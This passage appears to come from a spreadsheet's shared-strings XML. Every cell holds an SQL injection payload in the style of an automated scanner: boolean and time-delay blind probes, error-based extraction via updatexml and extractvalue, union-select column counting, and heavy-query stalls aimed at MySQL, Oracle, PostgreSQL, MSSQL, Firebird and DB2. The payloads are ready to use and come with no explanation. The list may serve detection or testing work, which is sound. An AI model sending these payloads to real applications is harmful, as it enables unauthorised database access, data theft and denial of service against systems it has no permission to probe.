    <t>1'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'fvov' = 'fvov</t>
  </si>
  <si>
    <t>1  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 4234 = 4234</t>
  </si>
  <si>
    <t>-5969" where 9248 = 9248 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( 'acdu' = 'acdu</t>
  </si>
  <si>
    <t>1" )  where 7950 = 7950 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( "pjql" like "pjql</t>
  </si>
  <si>
    <t>-4558' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  and 7153 = 7474--</t>
  </si>
  <si>
    <t>1'+ ( select 'aphz' where 1933 = 1933 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-2569' union all select 4484--</t>
  </si>
  <si>
    <t>1" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and "rdri" = "rdri</t>
  </si>
  <si>
    <t>1" )  as qnmd where 5642 = 5642</t>
  </si>
  <si>
    <t>-5644"  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( "evcf" = "evcf</t>
  </si>
  <si>
    <t>1 )  and elt ( 7425 = 8842,8842 )  and  ( 9194 = 9194</t>
  </si>
  <si>
    <t>-7313" )  where 3606 = 3606 union all select 3606#</t>
  </si>
  <si>
    <t>1'+ ( select 'vbqo' where 5630 = 5630 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>-4952'  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t>1' )  where 2443 = 2443 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 2230 = 2230</t>
  </si>
  <si>
    <t>-6073"  )  )   )  or 9502 = 2012#</t>
  </si>
  <si>
    <t>-6754' )  where 8388 = 8388 union all select 8388,8388,8388,8388,8388--</t>
  </si>
  <si>
    <t>1" )  as saqy where 9704 = 9704  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>-5109  )  )   )  or make_set ( 6627 = 7331,7331 )  and   (  (   ( 9466 = 9466</t>
  </si>
  <si>
    <t>-3370" )  union all select 7845,7845,7845,7845,7845,7845#</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 'hglq' like 'hglq</t>
  </si>
  <si>
    <t>-8143 )  union all select 3014--</t>
  </si>
  <si>
    <t>1'  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'hgtg' = 'hgtg</t>
  </si>
  <si>
    <t>-2241 )  where 7606 = 7606 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>1" or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>-3595'+ ( select vppx where 6018 = 6018 union all select 6018,6018,6018,6018,6018#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and "hjxh" = "hjxh</t>
  </si>
  <si>
    <t>1' where 4460 = 4460</t>
  </si>
  <si>
    <t>-8760" union all select 2309,2309,2309,2309,2309,2309,2309,2309,2309#</t>
  </si>
  <si>
    <t>1'+ ( select trte where 9173 = 9173 and 2006 = 2006</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and "%" = "</t>
  </si>
  <si>
    <t>1'</t>
  </si>
  <si>
    <t>1' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'ajkb' = 'ajkb</t>
  </si>
  <si>
    <t xml:space="preserve">-6523" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t>1"  )  )   as fjtv where 8904 = 8904</t>
  </si>
  <si>
    <t>1%' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'cgbf' like 'cgbf</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'kpsg' like 'kpsg</t>
  </si>
  <si>
    <t>1' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'ejnt' like 'ejnt</t>
  </si>
  <si>
    <t>1"  )  )   as isqj where 6344 = 6344 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  as bfuy where 3879 = 3879 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-7565' )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'gymz' = 'gymz</t>
  </si>
  <si>
    <t>-7021' or 3038 = 3038</t>
  </si>
  <si>
    <t>-4546' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>1"  )  )   as krro where 1050 = 1050 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as sdlv where 5922 = 5922 and 2006 = 2006</t>
  </si>
  <si>
    <t>-5026' where 7324 = 7324 union all select 7324,7324--</t>
  </si>
  <si>
    <t xml:space="preserve">1" rlike  ( select  ( case when  ( 5552 = 1712 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1" )  where 5698 = 5698 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  as ccee where 8880 = 8880 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' where 1893 = 1893 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-4571' union all select 3227,3227,3227,3227--</t>
  </si>
  <si>
    <t>1'  )  )   as plgq where 1121 = 1121</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "msjh" like "msjh</t>
  </si>
  <si>
    <t>1" where 9230 = 9230</t>
  </si>
  <si>
    <t>1%' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   as iubt where 8179 = 8179 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) #</t>
  </si>
  <si>
    <t>1'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  'cqwz' like 'cqwz</t>
  </si>
  <si>
    <t>1'+ ( select 'cstd' where 9326 = 9326 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   ) +'</t>
  </si>
  <si>
    <t>1'|| ( select 'vekn' from dual where 4929 = 4929 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5  )  )  ||'</t>
  </si>
  <si>
    <t>1" )  as wsyv where 8142 = 8142 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( "qkds" like "qkds</t>
  </si>
  <si>
    <t>1%"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1' )  where 9272 = 9272</t>
  </si>
  <si>
    <t>1'+ ( select dyfw where 7743 = 7743 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   ) +'</t>
  </si>
  <si>
    <t>-5967 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   a</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'rfln' = 'rfln</t>
  </si>
  <si>
    <t>1%' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'gqsk' where 3087 = 3087 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select unzl where 3432 = 3432 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9145' )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'yvfl' like 'yvfl</t>
  </si>
  <si>
    <t>1'|| ( select 'zpwe' from dual where 7743 = 7743 union all select null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>1' )  as yyyb where 1705 = 1705 and  ( 8770 = 6988 ) *6988--</t>
  </si>
  <si>
    <t>1  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 7484 = 7484</t>
  </si>
  <si>
    <t>1'|| ( select 'mdqc' where 4533 = 4533 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>-4145%"  )  )   union all select 9404,9404,9404,9404,9404,9404,9404#</t>
  </si>
  <si>
    <t>1"  )  )   as uycc where 4364 = 4364 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'xlmt' where 1664 = 1664</t>
  </si>
  <si>
    <t>1  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  7992 = 7992</t>
  </si>
  <si>
    <t>1'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'guxv' = 'guxv</t>
  </si>
  <si>
    <t>-3497' order by 1#</t>
  </si>
  <si>
    <t>-8098%' )  union all select 5697,5697,5697,5697,5697,5697,5697,5697,5697,5697#</t>
  </si>
  <si>
    <t>-9845" )  as xpis where 1936 = 1936 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'mwmn' where 5112 = 5112 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>-2100' where 9260 = 9260 or 3038 = 3038</t>
  </si>
  <si>
    <t>1' and 4374 = 2305</t>
  </si>
  <si>
    <t>1 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) -- dpph</t>
  </si>
  <si>
    <t>1' )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'rtbm' = 'rtbm</t>
  </si>
  <si>
    <t>1" union all select null,null,null#</t>
  </si>
  <si>
    <t>1" )  order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) -- gkcl</t>
  </si>
  <si>
    <t>-6292 )  union all select 7499,7499,7499,7499,7499,7499,7499--</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 6560 = 2813 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>-5661'  )  )   union all select 3011,3011#</t>
  </si>
  <si>
    <t>1"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "atlz" = "atlz</t>
  </si>
  <si>
    <t>1' )  where 7561 = 7561 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( "uisi" = "uisi</t>
  </si>
  <si>
    <t>select  ( case when  ( 4624 = 4844 )  then 4624 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 8382 = 8382 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" where 8016 = 8016</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1' waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'  )  )   as dckd where 1794 = 1794</t>
  </si>
  <si>
    <t>1" )  as rgod where 5766 = 5766 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'zoxm' like 'zoxm</t>
  </si>
  <si>
    <t>1" or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-2044%'  )  )   or elt ( 9299 = 3618,3618 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-4980" or  ( 8459 = 8459 ) *4906 and "mnlj" like "mnlj</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "vcjt" like "vcjt</t>
  </si>
  <si>
    <t>1' and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'tmwy' = 'tmwy</t>
  </si>
  <si>
    <t>select  ( case when  ( 4572 = 4086 )  then 1 else 4572* ( select 4572 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-5903%"  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1'|| ( select 'jbgg' from dual where 1986 = 1986 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( 'beju' like 'beju</t>
  </si>
  <si>
    <t>1' )  as vpop where 2528 = 2528 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> end and 'blit' = 'blit</t>
  </si>
  <si>
    <t>1"  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  "gmld" like "gmld</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 1661 = 7683</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "tiet" like "tiet</t>
  </si>
  <si>
    <t>1%' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and '%' = '</t>
  </si>
  <si>
    <t>-6170  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1" )  as fkgs where 5948 = 5948 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" where 9804 = 9804 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-2748'  )  )   as gazw where 4624 = 4624 union all select 4624,4624#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 )  as qjjm where 3850 = 3850 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) </t>
  </si>
  <si>
    <t>1 )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' where 8128 = 8128</t>
  </si>
  <si>
    <t>-2715'  )  )   union all select 8646,8646,8646,8646,8646,8646,8646,8646--</t>
  </si>
  <si>
    <t>1' where 2332 = 2332 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" waitfor delay '0:0:5' and "dvfr" like "dvfr</t>
  </si>
  <si>
    <t>1 where 3478 = 3478  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>1' )  where 3572 = 3572</t>
  </si>
  <si>
    <t>1%'  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-7084 )  where 2260 = 2260 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( "hgds" like "hgds</t>
  </si>
  <si>
    <t>1%' )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-7209'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1' in boolean mode )  order by 1--</t>
  </si>
  <si>
    <t>1 )  where 6374 = 6374 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1 )  as hlcn where 1165 = 1165 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1 )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( 6690 = 6690</t>
  </si>
  <si>
    <t>1'+ ( select rwse where 9843 = 9843 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%'  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>1%'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and '%' = '</t>
  </si>
  <si>
    <t>1  )  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as qgyz where 1547 = 1547 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-6144' )  or 9385 = 2474--</t>
  </si>
  <si>
    <t>1" where 3764 = 3764</t>
  </si>
  <si>
    <t xml:space="preserve">-5982' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   </t>
  </si>
  <si>
    <t>1 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) -- ybmz</t>
  </si>
  <si>
    <t>1" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "aixs" = "aixs</t>
  </si>
  <si>
    <t>1'|| ( select 'ozki' where 4435 = 4435  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1 where 4844 = 4844</t>
  </si>
  <si>
    <t>1'+ ( select ttae where 4601 = 4601 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>-5751 )  as jybu where 4739 = 4739 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +</t>
  </si>
  <si>
    <t>1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "zgoy" like "zgoy</t>
  </si>
  <si>
    <t>-8410'  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%"  )  )   and make_set ( 9897 = 5557,5557 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
